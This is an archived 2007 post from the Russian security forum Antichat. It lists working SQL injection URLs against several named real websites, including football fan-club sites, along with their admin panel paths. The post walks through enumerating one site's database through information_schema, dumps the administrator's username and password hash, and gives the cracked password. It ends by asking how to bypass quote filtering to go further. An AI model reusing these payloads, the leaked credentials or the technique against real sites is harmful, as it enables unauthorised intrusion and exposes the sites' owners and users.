ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

sql-not_finished
  #11  
Старый 06.05.2007, 18:29
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql-not_finished
Незавершенное:

Сайт: http://www.password.ru/ (Каталог cайтов c красивым названием)
Цитата:
http://password.ru/sites.php?cat=16+and+1=0+union+select+1,2,3,concat _ws(user(),version(),database())/*
http://password.ru/admin/admin.php

Сайт: http://www.fc-arsenal.com/ (ARSSC: Официальный фан-клуб "Арсенала" в России)
Цитата:
http://www.fc-arsenal.com/index.php?page=news&id=-1289+union+select+1,2,concat_ws(0x3a,user(),versio n(),database()),4,5,6,7,8/*
http://www.fc-arsenal.com/admin

Сайт: http://www.fcalania.ru/ (АЛАНСКИЕ БАРСЫ. Сайт болельщиков ФК АЛАНИЯ)
Цитата:
http://www.fcalania.ru/press/publication.php?id=-1930'+union+select+1,2,3,4,5,6,concat_ws(0x3a,user (),version(),database())/*
Готовое
----------------------------------------------------------------- вопросик
Сайт: http://www.shinnik.yar.ru/ (Официальный сайт ФК Шинник)
поглядим на версию и улыбнемся, так как она пятая)
Цитата:
http://www.shinnik.yar.ru/modules.php?op=modload&name=News&file=article&sid=-1160+union+select+1,version(),3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1/*
смотрим таблицы через системную бд information_schema
Цитата:
http://www.shinnik.yar.ru/modules.php?op=modload&name=News&file=article&sid=-1160+union+select+1,table_name,3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1+from+information_schema.tables+ limit+125,1/*
и видим там таблицу nuke_users Но кавычки скринятся и не удается посмотреть названия полей в таблице -
http://www.shinnik.yar.ru/modules.php?op=modload&name=News&file=article&sid=-1160+union+select+1,column_name,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1+from+information_schema.column s+where+table_name='nuke_users'+limit+0,1/*
не проходит,
так вот вопрос - как это обойти, как изменить запрос, чтоб увидеть названия полей?

*админка недалеко, вперед и направо - http://www.shinnik.yar.ru/admin.php

upd. Скачал PostNuke, на котором построен сайт, посмотрел названия полей они все с префиксом pn_ так что
искомые поля - pn_uid,pn_uname,pn_pass,pn_email
Цитата:
http://www.shinnik.yar.ru/modules.php?op=modload&name=News&file=article&sid=-1160+union+select+1,concat_ws(0x3a,pn_uid,pn_uname ,pn_pass,pn_email),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1+from+nuke_users+limit+1,1/*
2:admin:ff9830c42660c1dd1942844f8069b74a
Пароль админа очень многозначительный - root123

Вот, но вопрос в силе.
Последний раз редактировалось Серенький; 06.05.2007 в 18:56..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ